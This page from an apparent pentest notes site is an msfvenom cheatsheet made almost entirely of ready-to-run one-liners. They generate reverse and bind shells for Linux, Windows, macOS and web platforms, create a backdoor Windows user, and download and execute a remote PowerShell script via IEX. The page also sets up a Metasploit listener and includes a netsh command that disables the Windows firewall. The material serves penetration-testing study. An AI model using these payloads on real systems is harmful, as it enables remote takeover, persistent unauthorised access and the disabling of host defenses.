Dado1513
  • Dado1513 Pentest Notes
  • Introduction & Documentation
  • Pentesting Methodologies
  • External Recon Pentesting
  • Brute Force
  • LotL - Living off the Land
  • Pivoting Tunnelling and Port Forward
  • Active Directory
    • 🛠️Active Directory Enumeration & Attacks
    • 🛠️ACL/ACE Abuse
    • 🛠️ADCS
    • Kerberos Attack Cheatsheet
    • 🛠️Trust Attacks
  • Linux Pentesting
    • Linux Privilege Escalation
  • Windows Pentesting
    • Windows Privilege Escalation
  • Mobile Pentesting
    • 🛠️Android Application Pentesting
    • 🛠️iOS Application Pentesting
  • Cloud Pentest
    • 🛠️Cloud Pentesting
  • Wireless Pentesting
    • 🛠️WiFi Pentesting
  • Web Pentesting
    • 🛠️XSS Cheatsheet
    • 🛠️SQL Injection
  • OSINT
    • Google Dorks
  • Network Services Pentest
    • Attacking Common Services
    • 🛠️139,445 SMB
    • 🛠️161,162,10161,10162- Pentesting SNMP
    • 🛠️winrm
  • Tools
    • NetExec
    • chisel
    • bloodyAD
    • PowerView
    • certipy
    • sqlmap
    • mimikatz
    • mSFVenom Cheatsheet
    • Ligolo-ng
    • Rubeus
    • ldapsearch
Powered by GitBook
On this page
  • MSFVenom Cheatsheet
  • MSFVenom Cheatsheet
  • Multihandler Listener
  • Windows Bind Shell
  • References
  1. Tools

mSFVenom Cheatsheet

MSFVenom Cheatsheet

Single Page Cheatsheet for common MSF Venom One Liners Available in PDF, DOCX and Markdown format! PDF and DOCX versions contain the payload size in bytes and a few more commands.

MSFVenom Cheatsheet

MSFVenom Payload Generation One-Liner
Description

msfvenom -l payloads

List available payloads

msfvenom -p PAYLOAD --list-options

List payload options

msfvenom -p PAYLOAD -e ENCODER -f FORMAT -i ENCODE COUNT LHOST=IP

Payload Encoding

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf

Linux Meterpreter reverse shell x86 multi stage

msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf

Linux Meterpreter bind shell x86 multi stage

msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf

Linux bind shell x64 single stage

msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf

Linux reverse shell x64 single stage

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

Windows Meterpreter reverse shell

msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe

Windows Meterpreter http reverse shell

msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe

Windows Meterpreter bind shell

msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

Windows CMD Multi Stage

msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

Windows CMD Single Stage

msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe

Windows add user

msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP LPORT=PORT -f macho > shell.macho

Mac Reverse Shell

msfvenom -p osx/x86/shell_bind_tcp RHOST=IP LPORT=PORT -f macho > shell.macho

Mac Bind shell

msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw > shell.py

Python Shell

msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT=PORT -f raw > shell.sh

BASH Shell

msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw > shell.pl

PERL Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f asp > shell.asp

ASP Meterpreter shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.jsp

JSP Shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f war > shell.war

WAR Shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.php cat shell.php

pbcopy && echo '?php '

msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > phpreverseshell.php

Php Reverse Shell

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')" -f python

Windows Exec Nishang Powershell in python

msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x04\xA0"

Bad characters shikata_ga_nai

msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/fnstenv_mov -b "\x04\xA0"

Bad characters fnstenv_mov

Multihandler Listener

To get multiple session on a single multi/handler, you need to set the ExitOnSession option to false and run the exploit -j instead of just the exploit. For example, for meterpreter/reverse_tcp payload,

msf>use exploit/multi/handler  
msf>set payload windows/meterpreter/reverse_tcp  
msf>set lhost <IP>  
msf>set lport <PORT>  
msf> set ExitOnSession false  
msf>exploit -j  

The -j option is to keep all the connected session in the background.

Windows Bind Shell

  • create a shell bind on listen on port on current machine (to run on windows and after connect on port PORT)

msfvenom -p windows/x64/shell_bind_tcp LHOST=0.0.0.0 LPORT=PORT -f exe > windowsbindshellPORT.exe
netsh advfirewall set allprofiles state off
windowsbindshellPORT.exe

On attacker machine

nc iptarget PORT

References

  • https://kb.help.rapid7.com/discuss/598ab88172371b000f5a4675

  • https://thor-sec.com/cheatsheet/oscp/msfvenom_cheat_sheet/

  • http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/

  • Windows Macro - https://www.offsec.com/metasploit-unleashed/vbscript-infection-methods/

PreviousmimikatzNextLigolo-ng

Last updated 1 month ago